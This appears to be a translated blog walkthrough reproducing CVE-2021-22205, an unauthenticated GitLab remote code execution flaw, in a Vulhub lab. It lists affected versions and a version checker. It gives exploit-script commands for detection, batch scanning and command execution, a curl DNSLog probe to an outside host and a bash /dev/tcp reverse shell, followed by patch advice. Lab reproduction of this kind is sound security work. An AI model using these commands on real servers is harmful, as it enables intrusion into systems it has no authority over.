CVE Vulnerability Reproduction: CVE-2021-22205 GitLab Unauthenticated RCE

CVE-2021-22205 GitLab unauthenticated RCE

Vulnerability background and description

On April 15, 2021, GitLab officially released a security patch fixing a command execution vulnerability in GitLab (CVE-2021-22205). Because the ExifTool bundled with GitLab does not correctly validate the extension of an uploaded image file, an attacker can execute arbitrary commands on the target server by uploading a specially crafted malicious image. The vulnerable code is reachable through an endpoint in GitLab that requires no authentication, so the vulnerability can be exploited without logging in. Both Community Edition (CE) and Enterprise Edition (EE) are affected, and the CVSS score is 9.9.

Affected versions

  • 11.9 <= GitLab CE/EE < 13.8.8
  • 13.9 <= GitLab CE/EE < 13.9.6
  • 13.10 <= GitLab CE/EE < 13.10.3
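A version range check for the affected versions listed above, as an added example that is not part of the original post. The ranges are copied from the list; the sample version strings fed to it are constructed. It compares versions numerically so that 13.10 sorts after 13.9, which a plain string comparison gets wrong.

```python
# Added example (not from the original post): decide whether a GitLab
# version string falls inside the affected ranges given in the advisory.
# Each range is half-open: the lower bound is affected, the upper bound is fixed.
from typing import Tuple

# (first affected, first fixed) for each release line, copied from the list above
AFFECTED_RANGES = [
    ("11.9", "13.8.8"),
    ("13.9", "13.9.6"),
    ("13.10", "13.10.3"),
]


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '13.10.3' (or '13.10.3-ee') into a tuple of ints.

    Tuples of ints compare component by component, so 13.10 > 13.9 as
    intended, whereas the strings '13.10' < '13.9'. Missing trailing
    components are treated as zero, so '13.9' means '13.9.0'.
    """
    core = version.strip().split("-")[0]  # drop suffixes such as '-ee' or '-ce'
    parts = tuple(int(p) for p in core.split("."))
    return parts + (0,) * (3 - len(parts))


def is_affected(version: str) -> bool:
    """Return True if the version lies inside any of the affected ranges."""
    v = parse_version(version)
    return any(parse_version(lo) <= v < parse_version(hi) for lo, hi in AFFECTED_RANGES)


def main() -> None:
    # Constructed sample inputs; in practice use the version reported by your instance.
    for sample in ["13.10.2", "13.10.3", "13.9.5", "13.8.8", "12.0.0-ee", "13.11.0", "11.8.9"]:
        verdict = "AFFECTED, upgrade" if is_affected(sample) else "not in affected ranges"
        print(f"{sample:>12}: {verdict}")


if __name__ == "__main__":
    main()
```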

Vulnerability reproduction

This reproduction uses the Vulhub lab environment, so a local Vulhub setup is required first.

Enter the directory of the lab environment and start it with the following command:

docker-compose up -d


Check that the environment's port is exposed:

docker-compose ps


Access the target URL: http://192.168.0.109:8080


Download the exploit script: https://github.com/Al1ex/CVE-2021-22205


Vulnerability detection

python3 CVE-2021-22205.py -v true -t http://192.168.0.109:8080/


Batch detection

python3 CVE-2021-22205.py -s true -f target.txt

Exploitation

python3 CVE-2021-22205.py -a true -t http://192.168.0.109:8080/ -c command


DNSLog probe

Website: http://www.dnslog.cn/


python3 CVE-2021-22205.py -a true -t http://192.168.0.109:8080/ -c "curl p77j19.dnslog.cn"


Reverse shell

If the target has outbound network access, you can try a reverse shell.

Start a listener on the local machine:

nc -lvp 4444


# First write the reverse shell command into the file 1.sh under the tmp directory
python3 CVE-2021-22205.py -a true -t http://192.168.0.109:8080/ -c "echo 'bash -i >& /dev/tcp/192.168.0.109/4444 0>&1' > /tmp/1.sh"
# Then execute that file
python3 CVE-2021-22205.py -a true -t http://192.168.0.109:8080/ -c "bash /tmp/1.sh"


The local listener receives the session.


Vulnerability Prevention and Remediation

Official upgrade

GitLab has released a new version that fixes this vulnerability. Affected users should upgrade to the latest version as soon as possible. Official download link: https://about.gitlab.com/update/

Temporary protective measures

If you cannot upgrade right away, restrict access to the web port with an IP whitelist so that only trusted sources can reach GitLab.

Related: https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/

Origin blog.csdn.net/qq_64973687/article/details/130407944